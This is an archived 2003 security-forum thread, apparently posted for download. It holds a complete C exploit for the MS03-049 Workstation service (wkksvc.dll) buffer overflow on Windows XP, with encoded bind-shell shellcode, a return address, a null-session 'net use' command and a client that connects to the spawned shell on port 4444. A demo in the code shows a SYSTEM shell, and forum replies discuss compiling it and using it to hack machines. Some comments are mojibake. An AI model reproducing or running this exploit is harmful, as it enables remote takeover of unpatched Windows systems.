Wkksvc.dll Buffer Overflow Exploit Winxp

Full Version: Wkksvc.dll Buffer Overflow Exploit Winxp

GovernmentSecurity.org > The Archives > Public Downloads

Anarchy

Dec 11 2003, 02:04 AM

CODE

#define ADDR 0x75133776
//`call edi' instruction; tested winxpSP0ru,winxpSP1ru.
// ms03-049 wkksvc.dll buffer overflow exploit (winxp) modified by Firestorm
// + ¯®¤¤¥à¦ª àãááª®£® ï§ëª ¢ è¥««¥
#include <winsock2.h>
#include <windows.h>
#include <lm.h>
#include <winnls.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <io.h>
#pragma comment(lib,"ws2_32.lib")

/* DEMO

D:CBuilder6PROJECTS349>ntctl-03-49.exe 127.1.1.1
Attacking: 127.1.1.1
net use 127.1.1.1ipc$ "" /user:""
S®¬ ¤ ¢ë¯®«¥ ãá¯¥è®.

Waiting 1s...
Connecting 127.1.1.1:4444...Connected to 127.1.1.1:4444!

Microsoft Windows XP [,¥àá¨ï 5.1.2600]
(') S®à¯®à æ¨ï O ©ªà®á®äâ, 1985-2001.

D:WINDOWSsystem32>whoami
whoami
NT AUTHORITYSYSTEM

D:WINDOWSsystem32>exit
exit
-> Connection closed...
*/
typedef VOID (*MYPROC)(IN LPCWSTR Server OPTIONAL,
IN LPCWSTR AlternateName,
IN LPCWSTR DomainAccount OPTIONAL,
IN LPCWSTR DomainAccountPassword OPTIONAL,
IN ULONG Reserved
);

char overwrite[2045] = "";
char sc[] =
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" //
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" //like nop
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" //
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx90"
//'call edi' here

"xebx19x5ex31xc9x81xe9x89xff"
"xffxffx81x36x80xbfx32x94x81xeexfcxffxffxffxe2xf2"
"xebx05xe8xe2xffxffxffx03x53x06x1fx74x57x75x95x80"
"xbfxbbx92x7fx89x5ax1axcexb1xdex7cxe1xbex32x94x09"
"xf9x3ax6bxb6xd7x9fx4dx85x71xdaxc6x81xbfx32x1dxc6"
"xb3x5axf8xecxbfx32xfcxb3x8dx1cxf0xe8xc8x41xa6xdf"
"xebxcdxc2x88x36x74x90x7fx89x5axe6x7ex0cx24x7cxad"
"xbex32x94x09xf9x22x6bxb6xd7x4cx4cx62xccxdax8ax81"
"xbfx32x1dxc6xabxcdxe2x84xd7xf9x79x7cx84xdax9ax81"
"xbfx32x1dxc6xa7xcdxe2x84xd7xebx9dx75x12xdax6ax80"
"xbfx32x1dxc6xa3xcdxe2x84xd7x96x8exf0x78xdax7ax80"
"xbfx32x1dxc6x9fxcdxe2x84xd7x96x39xaex56xdax4ax80"
"xbfx32x1dxc6x9bxcdxe2x84xd7xd7xddx06xf6xdax5ax80"
"xbfx32x1dxc6x97xcdxe2x84xd7xd5xedx46xc6xdax2ax80"
"xbfx32x1dxc6x93x01x6bx01x53xa2x95x80xbfx66xfcx81"
"xbex32x94x7fxe9x2axc4xd0xefx62xd4xd0xffx62x6bxd6"
"xa3xb9x4cxd7xe8x5ax96x80xaex6ex1fx4cxd5x24xc5xd3"
"x40x64xb4xd7xecxcdxc2xa4xe8x63xc7x7fxe9x1ax1fx50"
"xd7x57xecxe5xbfx5axf7xedxdbx1cx1dxe6x8fxb1x78xd4"
"x32x0exb0xb3x7fx01x5dx03x7ex27x3fx62x42xf4xd0xa4"
"xafx76x6axc4x9bx0fx1dxd4x9bx7ax1dxd4x9bx7ex1dxd4"
"x9bx62x19xc4x9bx22xc0xd0xeex63xc5xeaxbex63xc5x7f"
"xc9x02xc5x7fxe9x22x1fx4cxd5xcdx6bxb1x40x64x98x0b"
"x77x65x6bxd6x93xcdxc2x94xeax64xf0x21x8fx32x94x80"
"x3axf2xecx8cx34x72x98x0bxcfx2ex39x0bxd7x3ax7fx89"
"x34x72xa0x0bx17x8ax94x80xbfxb9x51xdexe2xf0x90x80"
"xecx67xc2xd7x34x5exb0x98x34x77xa8x0bxebx37xecx83"
"x6axb9xdex98x34x68xb4x83x62xd1xa6xc9x34x06x1fx83"
"x4ax01x6bx7cx8cxf2x38xbax7bx46x93x41x70x3fx97x78"
"x54xc0xafxfcx9bx26xe1x61x34x68xb0x83x62x54x1fx8c"
"xf4xb9xcex9cxbcxefx1fx84x34x31x51x6bxbdx01x54x0b"
"x6ax6dxcaxddxe4xf0x90x80x2fxa2x04";

char netuse[100];
char exp_buf[2045+4+16+(sizeof sc)];
char ip[30];
LPWSTR ipl[60];
DWORD calledi = ADDR;
LPWSTR unicodesp0[(2045+4+16+(sizeof sc))*2];
char unicode[(2045+4+16+(sizeof sc))*2];
int i = 0;
int x = 0;
int len = 0;
HINSTANCE hinstLib;
MYPROC ProcAddr;
char *host;
int SP;
DWORD WINAPI ThreadFunc( LPVOID lpParam )
{
// asm int 3;
_snprintf(ip, 24, "\%s", host);

hinstLib = LoadLibrary("netapi32.dll");

memset(overwrite, 0x41, 2000);
memset(overwrite+2000, 0x90, 44);
memcpy(exp_buf, overwrite, 2044);
memcpy(exp_buf+2044, &calledi, 4);
memset(exp_buf+2048, 0x90, 16);
memcpy(exp_buf+2064, sc, sizeof(sc));

memset(unicode, 0x00, sizeof(unicode));
for (x = 0, i = 0; i <= sizeof(unicode); x++, i+=2) unicode = exp_buf[x];
MultiByteToWideChar(CP_ACP, NULL, exp_buf, sizeof(exp_buf), (unsigned short *)unicodesp0,sizeof(unicodesp0));

MultiByteToWideChar(CP_ACP, NULL, ip, 30, (unsigned short*)ipl, 60);

if (hinstLib != NULL)
{
ProcAddr = (MYPROC) GetProcAddress(hinstLib,"NetAddAlternateComputerName");
if (NULL != ProcAddr)
{
// printf("nGetProcAddr: %xn", *ProcAddr);
(ProcAddr)((LPCWSTR)ipl,(const unsigned short *)unicodesp0,NULL,NULL,0);
(ProcAddr)((LPCWSTR)ipl,(const unsigned short *)unicode,NULL,NULL,0);
// § ¬¥ç¥®, çâ® ¯à¨ ¥ã£ ¤ë¢ ¨¨ á¥à¢¨á¯ ª ¨ç¥£® ¥®¡ëç®£® ¥ ¯à®¨áå®¤¨â, ¯®íâ®¬ã
// íªá¯«®©â¨¬ ®¤®¢à¥¬¥® ª ª sp0 ¨ sp1
}
else printf("procaddr nulln");
FreeLibrary(hinstLib);
} else printf("hinst nulln");
ExitThread(0);
}

void err_exit(char *s) {
printf("%sn",s);
exit(0);
}
void shell(int sock) {
int l;
char buf[512];
struct timeval time;
unsigned long ul[2];

time.tv_sec=1;
time.tv_usec=0;

while (1) {
ul[0]=1;
ul[1]=sock;

l=select(0,(fd_set *)&ul,NULL,NULL,&time);
if(l==1) {
l=recv(sock,buf,sizeof(buf),0);
if (l<=0) {
err_exit("-> Connection closed...n");
}
l=write(1,buf,l);
if (l<=0) {
err_exit("-> Connection closed...n");
}
}
else {
l=read(0,buf,sizeof(buf));
if (l<=0) {
err_exit("-> Connection closed...n");
}
l=send(sock,buf,l,0);
if (l<=0) {
err_exit("-> Connection closed...n");
}
}
}
}

int main(int argc, char **argv) {
DWORD dwThreadId, dwThrdParam = 1;
WSADATA tmp;
struct hostent *he;
struct sockaddr_in their_addr;
int sockfd;
if (argc < 2) {
fprintf(stderr, "ms03-049 winxp wkksvc.dll buffer overflow exploit.n");
fprintf(stderr, "Usage: %s <ip>n",argv[0]);
exit(1);
}
// SP=atoi(argv[2]); //unused
host=argv[1];
printf("Attacking: %sn",host);

sprintf(&netuse,"net use \%sipc$ "" /user:""",host);
printf("%sn",netuse);
system(netuse);

CreateThread(NULL,0,ThreadFunc,&dwThrdParam,0,&dwThreadId);
printf("Waiting 1s...");Sleep(1000);
printf("nConnecting %s:%d...",host,4444);

WSAStartup (MAKEWORD(2,0),&tmp);
he = gethostbyname(host);

their_addr.sin_family = AF_INET;
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
their_addr.sin_port = htons(4444);
sockfd=socket(AF_INET,SOCK_STREAM,0);

if(connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
{
printf("Couldnt connect to bindshell.n");
return(0);
}
printf("Connected to %s:%d!nn",host,4444);Sleep(100);
shell(sockfd);
return(0);
}

WeeDMoNKeY

Dec 11 2003, 02:15 AM

just trying on some english machines (dont have a russian one) i get errors in the code or someshit. gives me some .c error, compiled wrong? seems to work well other than that... (and yes i got nc.exe) in my dir (if it sneeded) or mayb eit gives the errors whena ttacking eglish machines, dont think so though

Anarchy

Dec 11 2003, 02:40 AM

error?
i tested it on some Chinese machine(winxp)
create null session and send pac success
im finding the ADDR i need now

SLiM577

Dec 11 2003, 03:49 AM

Ermm good job anarchy im proud of u.

WeeDMoNKeY

Dec 11 2003, 04:09 AM

i gotta ask, how the (filtered) do you find ret address's? can someone give me a papaer pls? thx.

Kynroxes

Dec 11 2003, 05:51 AM

erf, good work man !! tks u !!

boshcash

Dec 11 2003, 01:18 PM

guys i dunno why u keep getting different workstation exploits , now many workstation exploits work (i tried one and worked for xp) , so plz see other exploits like messenger service and the rpc2 , those are more important , because i didnt see a working one except DoS at rpc2

Arnie

Dec 11 2003, 01:42 PM

QUOTE (boshcash @ Dec 11 2003, 01:18 PM)

shutup or write one yourself (nofi)

Anarchy

Dec 11 2003, 03:02 PM

if i wanna hack some machine
one of the Exploits is enough
but if wanna study
i think i may see more exploits

DJVASTVASTY2K

Dec 11 2003, 04:01 PM

Hello M8's

Thanks 4 This Anarchy

Great Work There Bud

Nice 2 See Some Work Station Exp

I Compiled But Got Errors

But Thanks For Compileing It Man

Best Regards

Adam

Vast Gsm

WeeDMoNKeY

Dec 11 2003, 09:55 PM

i had trouble compiling also, but im really wondering on how to find offsets more than anything, anyone have a paper i can read on "how to"?

FLAT

Dec 12 2003, 10:26 PM

i will test it

thx

flame

Dec 13 2003, 02:21 AM

seems to be an error here is a snapshot

WeeDMoNKeY

Dec 13 2003, 06:34 PM

aye flame, thats exactly the error i was talking about getting.

320X

Dec 15 2003, 02:53 AM

is not a casuality...

WeeDMoNKeY

Dec 15 2003, 03:34 AM

huh ?
is not a casuality... ?
how does that have anythign to do with this?

teest

Dec 15 2003, 10:19 PM

thanks

DJVASTVASTY2K

Dec 16 2003, 03:55 AM

I Had The Same Error Too

Anyone Debugged This Successfully.

Best Regards

Adam

Vast Gsm

xaph

Dec 16 2003, 07:21 AM

yo I get the same error message ... :-(

could someone debug, fix and reup it?

thx. greetz xaph

Anarchy

Dec 16 2003, 01:33 PM

error?

xaph

Dec 17 2003, 07:47 AM

brrr only works for chinese folks... :-)

flame

Dec 19 2003, 07:36 PM

well....
did we move on ?
lets make this work guys,
i hit him high you hit him low

Alex Trust

Dec 20 2003, 05:23 PM

thnx will try and compile it

PegHorse

Dec 29 2003, 10:00 PM

Good work thanks man !

Zero-X

Feb 8 2004, 07:49 PM

maybe anoob quesiton.. but what'S the port to check for

:P ?

-ZX

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.